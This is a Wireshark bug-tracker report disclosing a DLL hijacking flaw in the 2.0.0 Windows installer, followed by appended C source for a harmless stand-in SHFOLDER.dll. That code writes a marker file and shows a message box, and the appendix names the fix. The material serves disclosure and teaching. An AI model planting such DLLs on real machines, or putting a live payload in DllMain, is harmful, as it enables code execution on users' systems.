Bug ID: 12633
Summary: Wireshark DLL Hijacking Vulnerability
Product: Wireshark
Version: 2.0.0
Hardware: x86-64
OS: Windows 7
Status: UNCONFIRMED
Severity: Major
Priority: Low
Component: Extras
Assignee: [email protected]
Reporter: [email protected]
Created attachment 14744: POC
Build Information:
Paste the COMPLETE build information from "Help->About Wireshark", "wireshark -v", or "tshark -v".
--
Aloha,
Summary
Wireshark contains a DLL hijacking vulnerability that could allow an
unauthenticated, remote attacker to execute arbitrary code on the targeted
system. The vulnerability exists because a DLL file is loaded improperly by
'Wireshark-win64-2.0.0.exe', which allows an attacker to substitute a DLL
file of the attacker's choosing that could execute arbitrary code without
the user's knowledge.
Affected Product:
Wireshark 2.0.0 (tested) and other versions
Impact
An attacker can exploit this vulnerability to load a DLL file of the attacker's
choosing that could execute arbitrary code. This may help the attacker to
successfully exploit the system if the user creates a shell as a DLL.
More Details:
For software downloaded with a web browser the application directory is
typically the user's "Downloads" directory: see
<https://insights.sei.cmu.edu/cert/2008/09/carpet-bombing-and-directory-poisoning.html>,
<http://blog.acrossecurity.com/2012/02/downloads-folder-binary-planting.html>
and <http://seclists.org/fulldisclosure/2012/Aug/134> for "prior art" about
this well-known and well-documented vulnerability.
If an attacker places a malicious DLL in the user's "Downloads" directory (for
example via a "drive-by download" or "social engineering"), this vulnerability
becomes remote code execution.
Proof of concept/demonstration:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Create a malicious SHFOLDER.dll file and save it in your "Downloads"
directory.
2. Download 'Wireshark-win64-2.0.0.exe' and save it in your "Downloads"
directory.
3. Execute the .exe from your "Downloads" directory.
4. The malicious DLL file gets executed.
Chao!!
Himanshu Mehta
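Added example (not part of bug 12633, attachment 14744, or any Wireshark code): a benign stand-in for the "malicious SHFOLDER.dll" of step 1 of the proof of concept above. When the installer's loader picks this file up from the Downloads folder instead of %SystemRoot%\System32, DllMain runs inside the installer process, records which DLL was loaded by which process, and shows a message box. The marker file name, the use of %TEMP% for the marker, and the mingw-w64 cross-compile command are assumptions made for this example; the path-joining and marker-writing helpers are kept free of Windows APIs so they can be compiled and unit-tested anywhere.

```c
/* shfolder_poc.c - added example; not part of bug 12633, attachment 14744,
 * or Wireshark. A benign stand-in for the "malicious SHFOLDER.dll" of step 1:
 * when the installer's loader picks this file up from the Downloads folder,
 * DllMain runs, records which DLL was loaded by which process, and shows a
 * message box. Cross-compile on Linux (assumes mingw-w64 is installed):
 *   x86_64-w64-mingw32-gcc -shared -o SHFOLDER.dll shfolder_poc.c -luser32
 */
#include <stdio.h>
#include <string.h>

#ifdef _WIN32
#include <windows.h>
#define POC_PATHSEP "\\"
#else
#define POC_PATHSEP "/"
#endif

/* Marker file name is an assumption chosen for this example. */
#define POC_MARKER_NAME "shfolder_hijack_proof.txt"

/* Join dir and the marker name into out. Tolerates a trailing separator on
 * dir (GetTempPathA returns one) and refuses, rather than truncates, when
 * the result would not fit. Returns 1 on success, 0 otherwise. Portable so
 * it can be unit-tested without Windows. */
int poc_marker_path(const char *dir, char *out, size_t out_len)
{
    size_t dlen = strlen(dir);
    int has_sep = dlen > 0 && (dir[dlen - 1] == '/' || dir[dlen - 1] == '\\');
    if (dlen + 1 + strlen(POC_MARKER_NAME) + 1 > out_len)   /* dir + sep + name + NUL */
        return 0;
    snprintf(out, out_len, "%s%s%s", dir, has_sep ? "" : POC_PATHSEP, POC_MARKER_NAME);
    return 1;
}

/* The payload: write proof that the planted DLL ran, naming the DLL and the
 * host process. Returns the number of bytes written, 0 on failure. */
size_t poc_write_marker(const char *marker_path, const char *dll_path, const char *host_exe)
{
    FILE *f = fopen(marker_path, "w");
    if (!f)
        return 0;
    int n = fprintf(f, "DLL hijack PoC executed\nloaded DLL: %s\nhost process: %s\n",
                    dll_path, host_exe);
    fclose(f);
    return n > 0 ? (size_t)n : 0;
}

#ifdef _WIN32
/* Entry point the Windows loader calls once the DLL is mapped into the
 * installer. Everything happens on DLL_PROCESS_ATTACH; a real attacker's
 * payload would run here with the installer's privileges. */
BOOL WINAPI DllMain(HINSTANCE hinst, DWORD reason, LPVOID reserved)
{
    (void)reserved;
    if (reason == DLL_PROCESS_ATTACH) {
        char dll[MAX_PATH] = "", exe[MAX_PATH] = "", tmp[MAX_PATH], marker[MAX_PATH + 64];
        GetModuleFileNameA(hinst, dll, sizeof dll);   /* where this DLL was loaded from */
        GetModuleFileNameA(NULL, exe, sizeof exe);    /* the process that loaded it */
        if (GetTempPathA(sizeof tmp, tmp) && poc_marker_path(tmp, marker, sizeof marker))
            poc_write_marker(marker, dll, exe);
        /* Visible proof for the demo; a user32 call inside DllMain is not
         * loader-safe in general but is the usual choice for a PoC. */
        MessageBoxA(NULL, dll, "SHFOLDER.dll hijacked (PoC)", MB_OK | MB_ICONWARNING);
    }
    return TRUE;
}
#endif
```

The "loaded DLL" line in the marker file is the check that matters: it should name the copy in the Downloads folder, not the one under %SystemRoot%\System32. Expect the installer to fail or fall back after the message box, since this stand-in exports none of the functions the real SHFOLDER.dll provides. To confirm the search order without a DLL at all, Process Monitor filtered on the installer process and on paths containing SHFOLDER.dll shows the Downloads lookup happening before System32. On the loading side, the usual fix is to load system DLLs by fully qualified path or with LoadLibraryEx and LOAD_LIBRARY_SEARCH_SYSTEM32 so the application directory is never searched.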